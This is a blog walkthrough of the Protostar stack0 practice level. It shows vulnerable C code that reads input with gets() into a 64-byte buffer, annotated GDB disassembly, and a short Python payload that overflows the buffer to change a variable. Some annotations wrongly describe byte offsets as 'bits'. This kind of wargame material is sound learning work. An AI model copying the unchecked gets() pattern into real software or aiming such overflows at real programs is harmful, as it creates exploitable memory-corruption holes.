Binary Exploitation Protostar Stack0 - Walkthrough

Posted by Suraj Singh on April 04, 2018 · 6 mins read
Hello Guyz,




In This Post, I am going to show you how we can win protostar stack0 level. basically, here Our main Goal is To Understand How A Program Practically Works, And How Can We Understand Every Concept Very Clearly.

Before Starting This Walkthrough. I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • For Practical Hint, Check YouTube Video Given Below.


Source Code :



 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}


Disassembly Of Main Function (Using GDB)


########################################################################################################
                [ System Has Created Space For 60 Bits In hEx and 96 in Decimal Space On Stack]
########################################################################################################

[-------------------------------------code-------------------------------------]
   0x80483f5 <main+1>: mov    ebp,esp                          <<=== Save Base Pointer Onto Stack 
   0x80483f7 <main+3>: and    esp,0xfffffff0
   0x80483fa <main+6>: sub    esp,0x60                         <<=== This Instruction to Create Space of 96-Bits in Stack,
=> 0x80483fd <main+9>: mov    DWORD PTR [esp+0x5c],0x0         <<=== Here, This Instruction is to Insert 0 Into 92-96 Bits,
   0x8048405 <main+17>: lea    eax,[esp+0x1c]                   <<=== This Instruction is To Copy address of 28 bits starting 
                                                                      point from 96 bits Into EAX registers From There, move it 
                                                                      to stack so That it will work as a argument for get command.
   0x8048409 <main+21>: mov    DWORD PTR [esp],eax              <<=== Copy Eax into stack
   0x804840c <main+24>: call   0x804830c <gets@plt>             <<=== Perform Get Command
   0x8048411 <main+29>: mov    eax,DWORD PTR [esp+0x5c]         <<=== Get Value Of 92-96 bits and move it to EAX register


Situation On Stack



0                        28                                                      92        96
 ============================================================================================
        Other Things     |  Buffer(64)                                           | modified | 
 ============================================================================================
                         ^                                                            ^
                         |                                                            |
                       Get Overwrites from here                                       +
                                                                                  Target Area


Exploit


#!/usr/bin/python

# Total Size Of Buffer In Stack 60c
# 0x80483fa <main+6>: sub    esp,0x60 ==> 96 In Decimal
# 0x8048405 <main+17>: lea    eax,[esp+0x1c] 
# 0x804840c <main+24>: call   0x804830c <gets@plt> 
# 0x80483fd <main+9>: mov    DWORD PTR [esp+0x5c],0x0


payload = 'a'*64             # Buffer Variable Value
payload+= 'b'*4              # Modified Variable Value
# ./bin/stack0 < tmp
print payload



For More Detailed Walk through Check Below Provided YouTube Video Playlist



← Previous Post Next Post